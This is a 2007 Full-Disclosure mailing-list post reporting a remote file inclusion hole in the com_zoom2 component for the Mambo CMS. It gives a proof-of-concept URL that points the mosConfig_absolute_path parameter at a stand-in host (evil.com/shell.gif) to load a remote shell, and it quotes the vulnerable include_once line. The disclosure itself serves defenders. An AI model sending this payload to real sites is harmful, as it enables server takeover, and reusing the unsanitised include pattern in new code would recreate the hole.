[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability
0o_zeus_o0 elitemexico.org
zeus.olimpusklan at gmail.com
Wed Apr 11 03:24:47 BST 2007
com_zoom2 Mambo Module Remote File Include Vulnerability
##################
autor:0o_zeus_o0
website:www.diosdelared.com
mail:zeus at diosdelared.com
10/04/07
##################################
/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?
include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");
site download :
http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip
###################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070411/7e1bb65a/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.